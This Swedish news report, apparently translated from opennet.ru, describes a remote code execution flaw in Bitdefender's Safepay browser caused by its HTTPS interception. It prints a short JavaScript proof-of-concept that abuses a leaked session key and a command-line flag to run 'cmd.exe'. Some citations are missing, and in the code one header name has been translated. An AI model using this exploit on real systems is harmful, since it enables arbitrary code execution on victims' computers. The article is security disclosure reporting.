Vladimir Palant, skapare av Adblock Plus, () i den specialiserade webbläsaren Safepay baserad på Chromium-motorn, som erbjuds som en del av antiviruspaketet Bitdefender Total Security 2020 och som syftar till att öka säkerheten för användarens arbete på det globala nätverket (till exempel tillhandahålls ytterligare isolering vid åtkomst till banker och betalningssystem). Sårbarheten tillåter webbplatser som öppnas i webbläsaren att exekvera godtycklig kod på operativsystemnivå.
Orsaken till problemet är att Bitdefender antivirus utför lokal avlyssning av HTTPS-trafik genom att ersätta webbplatsens ursprungliga TLS-certifikat. Ett extra rotcertifikat är installerat på klientens system, vilket gör det möjligt att dölja driften av trafikinspektionssystemet som används. Antiviruset kilar in sig i skyddad trafik och infogar sin egen JavaScript-kod på vissa sidor för att implementera Safe Search-funktionen, och vid problem med det säkra anslutningscertifikatet ersätter det den returnerade felsidan med sin egen. Eftersom den nya felsidan visas på uppdrag av servern som öppnas, har andra sidor på den servern full åtkomst till innehållet som infogats av Bitdefender.
När du öppnar en webbplats som kontrolleras av en angripare, kan den webbplatsen skicka en XMLHttpRequest och låtsas problem med HTTPS-certifikatet när du svarar, vilket kommer att leda till att en felsida som är förfalskad av Bitdefender återkommer. Eftersom felsidan öppnas i sammanhanget för angriparens domän kan han läsa innehållet på den förfalskade sidan med Bitdefender-parametrar. Sidan som tillhandahålls av Bitdefender innehåller också en sessionsnyckel som låter dig använda det interna Bitdefender API för att starta en separat Safepay webbläsarsession, specificera godtyckliga kommandoradsflaggor och för att starta systemkommandon med "--utility-cmd-prefix" flagga. Ett exempel på en exploit (param1 och param2 är värden som erhålls från felsidan):
var request = new XMLHttpRequest();
request.open("POST", Math.random());
request.setRequestHeader("Innehållstyp", "application/x-www-form-urlencoded");
request.setRequestHeader(«BDNDSS_B67EA559F21B487F861FDA8A44F01C50», param1);
request.setRequestHeader(«BDNDCA_BBACF84D61A04F9AA66019A14B035478», param2);
request.setRequestHeader(«BDNDWB_5056E556833D49C1AF4085CB254FC242», «obk.run»);
request.setRequestHeader(«BDNDOK_4E961A95B7B44CBCA1907D3D3643370D», location.href);
request.send("data:text/html,nada —utility-cmd-prefix=\"cmd.exe /k whoami & echo\"");
Låt oss komma ihåg att en studie som genomfördes 2017 att 24 av 26 testade antivirusprodukter som inspekterar HTTPS-trafik genom certifikatspoofing minskade den övergripande säkerhetsnivån för en HTTPS-anslutning.
Endast 11 av de 26 produkterna gav aktuella chiffersviter. 5 system verifierade inte certifikat (Kaspersky Internet Security 16 Mac, NOD32 AV 9, CYBERsitter, Net Nanny 7 Win, Net Nanny 7 Mac). Produkterna Kaspersky Internet Security och Total Security utsattes för attacker , och AVG-, Bitdefender- och Bullguard-produkter attackeras и . Dr.Web Antivirus 11 låter dig rulla tillbaka till opålitliga exportchiffer (attack ).
Källa: opennet.ru